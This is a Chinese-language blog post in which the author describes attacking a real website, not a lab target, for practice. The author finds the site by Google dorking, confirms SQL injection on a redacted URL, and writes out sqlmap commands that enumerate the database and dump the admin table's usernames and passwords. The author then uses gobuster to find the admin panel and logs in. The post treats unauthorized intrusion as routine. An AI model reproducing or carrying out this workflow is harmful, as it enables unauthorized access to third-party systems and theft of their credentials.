Sql注入漏洞实战记录
以往在练习sql注入漏洞的时候都是通过搭建靶站的方式进行的,靶站的东西再怎么反复练习也就那么回事了,要是真想有个效果还得来点实际的!
闲来无事上google再翻一翻,以前也翻过很多次,无奈技术菜没有找到什么适合我这种菜鸟水平的站来测试一波,真正的大佬都是个站就日的,不像我这种菜鸡,测试个网站还得东翻翻西找找…按照以往的方式还是用goole hacker的方式进行;因为以前找的站结构都是asp.net+win+iis
架构的,对这个算是比较熟悉,所以这次用的语法还是这一套,输入hacker语法一顿向后翻页,前几页的不用想了,估计都被玩遍了
找了个网站进入后查看产品获取到链接地址:http://www.xxxxx.cn/show.asp?id=14
加个‘符号看看回显信息,发现返回了错误,再试试and 1 = 1 和 1 = 2
看下回显,确认是带有sql注入漏洞了
因为水平菜,暂时还不能通过sql语句拼接的方式达到最终目的,所以只能用sqlmap工具一波流了…
获取数据库信息
sqlmap -u http://www.xxxx.cn/show.asp?id=14%20and%201%20=%201 --dbs
验证数据库为Microsoft Access
获取数据库表
sqlmap -u http://www.xxxxx.cn/show.asp?id=14%20and%201%20=%201 --batch -D Microsoft Access –tables
获取表属性
sqlmap -u http://www.xxxx.cn/show.asp?id=14%20and%201%20=%201 --batch -D Microsoft Access –T admin --columns
获取表数据
sqlmap -u http://www.xxxx.cn/show.asp?id=14%20and%201%20=%201 --batch -D Microsoft Access –T admin –C username,password –dump
获取系统后台登录地址
后台通过gobuster
工具获取后登录
看下了以往的日志,发现该网站从N年前就一直被别人攻,但是好像网站管理人员并不对此上心(也有可能此网站已经被弃用了),导致现在还有不断的访问日志产生